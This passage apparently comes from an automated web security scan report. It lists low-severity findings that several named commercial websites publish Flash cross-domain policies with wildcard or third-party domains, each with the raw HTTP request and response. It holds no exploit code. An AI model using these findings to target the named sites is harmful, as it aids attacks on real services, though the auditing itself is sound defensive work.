GET /crossdomain.xml HTTP/1.0
Host: www.fanpop.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:32:52 GMT
Content-Type: text/xml
Content-Length: 212
Last-Modified: Mon, 08 Nov 2010 23:28:28 GMT
Connection: close
Expires: Sat, 02 Apr 2011 13:32:53 GMT
Cache-Control: max-age=1
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.meebo.com" />
</cross-dom
...[SNIP]...
7.257. http://www.fantage.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fantage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fantage.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:52 GMT
Server: Apache
Last-Modified: Tue, 05 Oct 2010 23:53:59 GMT
ETag: "a7051b-147-491e75fe293c0"
Accept-Ranges: bytes
Content-Length: 327
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.fantage.com" />
<allow-access-from domain="fantage-1" />
<allow-access-from domain="fantage-2" />
...[SNIP]...
7.258. http://www.fastcompany.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fastcompany.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:53 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.4
X-Drupal-Cache: MISS
Expires: Sat, 02 Apr 2011 14:15:05 GMT
Last-Modified: Sat, 02 Apr 2011 13:55:05 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1301752505"
Content-Length: 273
Vary: Accept-Encoding
X-Served-By: daa-www010
Content-Type: text/xml
X-Cache: MISS from VoxCAST
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.fastcompany.com" />
<allow-access-from domain="*.www.fastcompany.com" />
...[SNIP]...
7.259. http://www.fedex.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fedex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fedex.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:24:33 GMT
Content-length: 543
Content-type: text/xml
X-ua-compatible: IE=EmulateIE7
Set-cookie: fdx_cbid=22185494081301750673092930271330; expires=Monday, 18-January-2038 21:14:07 GMT; path=/; domain=.fedex.com
Last-modified: Fri, 29 Jan 2010 15:21:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.fedex.com"/>
...[SNIP]...
<allow-access-from domain="*http://www.myexperiencephoto.com"/>
...[SNIP]...
7.260. http://www.fidelity.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fidelity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fidelity.com

Response

HTTP/1.0 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Type: text/xml
Last-Modified: Mon, 30 Jul 2007 18:35:02 GMT
Content-Length: 256
ETag: "100-46ae2f56"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:32:33 GMT
Connection: close
Set-Cookie: MC=psTVCRkhsKDdSYTuQA5f4D4WS8cSAk2XJXEKBCgwIAA_ewABqjMGBAAAAQAGBU2XJXEAP03; path=/; domain=.fidelity.com; expires=Sun, 01-Apr-2012 13:32:33 GMT
Set-Cookie: v1st=26BDA52822D0120A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fidelity.com

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.fidelity.com" />
<allow-access-from domain="*.fmr.com" />
...[SNIP]...
7.261. http://www.finishline.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.finishline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.finishline.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 29 Apr 2009 18:02:28 GMT
ETag: "4063-111-61eaf500"
Accept-Ranges: bytes
Content-Length: 273
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 14:03:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 14:03:05 GMT
Connection: close
Set-Cookie: TLTSID=3AC9FCC45D32105D5AABD9EA3DBFBA95; Path=/; Domain=.finishline.com
Set-Cookie: TLTUID=3AC9FCC45D32105D5AABD9EA3DBFBA95; Path=/; Domain=.finishline.com; Expires=Sat, 02-04-2021 14:05:13 GMT
Set-Cookie: BIGipServerwww07.finishline.com_pool=385945772.20480.0000; path=/
Set-Cookie: ClientID=5016caeb6736a75e59acca3302e5f579;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/
...[SNIP]...
<allow-access-from domain="*.blastradius.com"/>
...[SNIP]...
7.262. http://www.food.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.food.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.food.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 03 Mar 2011 11:48:55 GMT
Accept-Ranges: bytes
Content-Length: 272
X-Cnection: close
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 13:42:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:42:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.recipezaar.com"/>
<allow-access-from domain="*.scrippsnetworks.com"/>
...[SNIP]...
7.263. http://www.foodnetwork.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foodnetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foodnetwork.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Tue, 10 Nov 2009 12:28:07 GMT
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:24:48 GMT
Content-Length: 1084
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <
...[SNIP]...
<allow-access-from domain="*.hgtvpro.com"/>
   <allow-access-from domain="*.hgtv.com"/>
   <allow-access-from domain="*.diynetwork.com"/>
   <allow-access-from domain="*.diynet.com"/>
   <allow-access-from domain="*.fineliving.com"/>
   <allow-access-from domain="*.food.com"/>
   <allow-access-from domain="*.foodnetwork.com"/>
   <allow-access-from domain="*.gactv.com"/>
   <allow-access-from domain="*.scrippsonline.com"/>
   <allow-access-from domain="*.hottrends2005.com"/>
   <allow-access-from domain="*.hottrends2006.com"/>
   <allow-access-from domain="*.scrippsnetworks.com"/>
   <allow-access-from domain="*.scripps.com"/>
   <allow-access-from domain="*.chumby.com"/>
   <allow-access-from domain="*.videomment.com"/>
   <allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.videomerce.com"/>
...[SNIP]...
7.264. http://www.forbes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.forbes.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:31:03 GMT
Server: Apache/1.3.26
Vary: Accept-Encoding,User-Agent
Last-Modified: Tue, 22 Dec 2009 15:13:03 GMT
ETag: "11033e1-4fb-4b30e1ff"
Accept-Ranges: bytes
Content-Length: 1275
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" />
<allow-access-from domain="static.scanscout.com" />
...[SNIP]...
<allow-access-from domain="images.forbes.com" />
<allow-access-from domain="rss.forbes.com" />
<allow-access-from domain="video.forbes.com" />
<allow-access-from domain="*.postapp.com" />
<allow-access-from domain="*.widgetbox.com" />
<allow-access-from domain="*.widgetserver.com" />
<allow-access-from domain="*.redcated" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="rmd.redcated" secure="false" />
...[SNIP]...
7.265. http://www.freelotto.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.freelotto.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.freelotto.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:40:28 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 21:25:36 GMT
ETag: "2947c-fb-4920d88e85400"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.freelotto.com" />
<allow-access-from domain="i.pinid.com" />
...[SNIP]...
7.266. http://www.ft.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "51d-4ba8ec18"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 1309
Date: Sat, 02 Apr 2011 13:39:27 GMT
Connection: close
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Server: Apache/1.3.37
Content-Type: text/xml
Keep-Alive: timeout=1, max=120

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...
7.267. http://www.ftd.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=8B1BF5185D2F105D0016842AE1A722A7; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=8B1BF5185D2F105D0016842AE1A722A7; Path=/; Domain=.ftd.com; expires=Sat, 02-04-2021 13:45:59 GMT
Vary: Accept-Encoding
X-Accelerator-Vary: Accept-Encoding
Last-Modified: Thu, 02 Dec 2010 02:32:40 GMT
ETag: "136-4cf70548"
Content-Type: text/xml
Content-Length: 310
Date: Sat, 02 Apr 2011 13:45:59 GMT
X-Varnish: 1841590900
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.akamai.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
...[SNIP]...
7.268. http://www.funbrain.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.funbrain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.funbrain.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=3600
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:27:16 GMT
ETag: "d4-44e3a23690f00"
Expires: Sat, 02 Apr 2011 14:27:16 GMT
Last-Modified: Tue, 27 May 2008 18:05:16 GMT
Server: Apache
Set-Cookie: Apache=10.243.58.175.1301750836369345; path=/; expires=Sun, 01-Apr-12 13:27:16 GMT; domain=.funbrain.com
Content-Length: 212
Connection: Close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.funbrain.com" />
</cross-dom
...[SNIP]...
7.269. http://www.funnyordie.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.funnyordie.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.funnyordie.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 22:16:03 GMT
X-Varnish: 2107042366 2107041865
Content-Length: 2171
X-Varnish: 2004702214 2004701541
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/(null)
Date: Sat, 02 Apr 2011 13:34:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.widgetbox.com" />
<allow-access-from domain="*.widgetserver.com" />
<allow-access-from domain="*.spinlets.com" />
<allow-access-from domain="*.ordienetworks.com" />
<allow-access-from domain="*.ordienetworks-staging.com" />
<allow-access-from domain="*.ordienetworks-integration.com" />
<allow-access-from domain="funnyordie.com" />
<allow-access-from domain="*.funnyordie.com" />
<allow-access-from domain="*.funnyordie-staging.com" />
<allow-access-from domain="*.funnyordie-integration.com" />
<allow-access-from domain="*.funnyordie.com.local" />
<allow-access-from domain="shredordie.com" />
<allow-access-from domain="*.shredordie.com" />
<allow-access-from domain="*.shredordie-staging.com" />
<allow-access-from domain="*.shredordie-integration.com" />
<allow-access-from domain="*.shredordie.com.local" />
<allow-access-from domain="eatdrinkordie.com" />
<allow-access-from domain="*.eatdrinkordie.com" />
<allow-access-from domain="*.eatdrinkordie-staging.com" />
<allow-access-from domain="*.eatdrinkordie-integration.com" />
<allow-access-from domain="*.eatdrinkordie.com.local" />
<allow-access-from domain="pwnordie.com" />
<allow-access-from domain="*.pwnordie.com" />
<allow-access-from domain="*.pwnordie-staging.com" />
<allow-access-from domain="*.pwnordie-integration.com" />
<allow-access-from domain="*.pwnordie.com.local" />
<allow-access-from domain="morraderir.com.br" />
<allow-access-from domain="*.morraderir.com.br" />
<allow-access-from domain="*.morraderir-staging.com.br" />
<allow-access-from domain="*.morraderir-integration.com.br" />
<allow-access-from domain="*.morraderir.com.br.local" />
...[SNIP]...
<allow-access-from domain="*.funnyordie.co.uk" />
<allow-access-from domain="*.funnyordie-staging.co.uk" />
<allow-access-from domain="*.funnyordie-integration.co.uk" />
<allow-access-from domain="*.funnyordie.co.uk.local" />
...[SNIP]...
7.270. http://www.gaiaonline.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gaiaonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gaiaonline.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:46:14 GMT
Server: Apache
Last-Modified: Fri, 25 Mar 2011 18:18:54 GMT
ETag: "308c1ca-4df-a065bf80"
Accept-Ranges: bytes
Content-Length: 1247
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><cross-domain-policy><site-control permitted-cross-domain-policies="all"/><allow-access-from domain="*.gaiaonline.com" to-ports="443,8080" secure="false"/><allow-access-from domain="*.gaiaonline.com" to-ports="5222" secure="false"/>
...[SNIP]...
<allow-access-from domain="66.147.214.164" to-ports="8080"/><allow-access-from domain="*.brainjelly.com" to-ports="8080"/><allow-access-from domain="*.kongregate.com" to-ports="8080"/>
...[SNIP]...
<allow-access-from domain="*.kongregatestage.com" to-ports="8080"/><allow-access-from domain="*.kongregatetrunk.com" to-ports="8080"/><allow-access-from domain="*.addictinggames.com" to-ports="8080"/>
...[SNIP]...
<allow-access-from domain="*.gworld.com" to-ports="8080" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.omgpop.com" to-ports="8080"/><allow-access-from domain="*.iminlikewithyou.com" to-ports="8080"/><allow-access-from domain="*.brightcove.com"/><allow-access-from domain="*.starzmediadigital.com"/>
...[SNIP]...
7.271. http://www.gamespot.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gamespot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamespot.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:00 GMT
Server: Apache
Last-Modified: Wed, 06 Feb 2008 01:04:07 GMT
ETag: "c4a6ab-1cc-44572ef1bafc0"
Accept-Ranges: bytes
Content-Length: 460
Keep-Alive: timeout=300, max=1000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="image.com.com" />
<allow-access-from domain="img.gamespot.com" />
<allow-access-from domain="i.i.com.com" />
<allow-access-from domain="dw.com.com" />
<allow-access-from domain="cnet.com" />
...[SNIP]...
7.272. http://www.gamestop.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamestop.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Location: http://www.gamestop.com/crossdomain.xml
Last-Modified: Thu, 31 Mar 2011 16:05:37 GMT
Accept-Ranges: bytes
ETag: "4fb75679bdefcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 725
Date: Sat, 02 Apr 2011 13:33:18 GMT
Connection: close

...<cross-domain-policy>
<allow-access-from domain="*.gamestop.com" secure="false" />
<allow-access-from domain="*.gamestop.ca" secure="false" />
<allow-access-from domain="*.ebgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
7.273. http://www.gamevance.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gamevance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamevance.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:26 GMT
Server: Apache
Last-Modified: Fri, 23 Jul 2010 08:31:14 GMT
ETag: "38025d-1a2-48c09db9df880"
Accept-Ranges: bytes
Content-Length: 418
Cache-Control: max-age=18000
Expires: Sat, 02 Apr 2011 18:53:26 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*.gv.facdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false"/>
...[SNIP]...
7.274. http://www.gap.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gap.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1350-1299723512000"
Last-Modified: Thu, 10 Mar 2011 02:18:32 GMT
Content-Type: application/xml
Content-Length: 1350
Date: Sat, 02 Apr 2011 13:31:28 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<!--
Cross Domain Entry Descriptions:

.gidapps.com: [added 6.40]
U
...[SNIP]...
<allow-access-from domain="*.gidapps.com"/>
...[SNIP]...
<allow-access-from domain="*.assets-gap.com"/>
...[SNIP]...
<allow-access-from domain="*.assets-gid.com"/>
...[SNIP]...
<allow-access-from domain="*.gap1969.com"/>
...[SNIP]...
<allow-access-from domain="akqasfht.vo.llnwd.net"/>
...[SNIP]...
7.275. http://www.gather.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

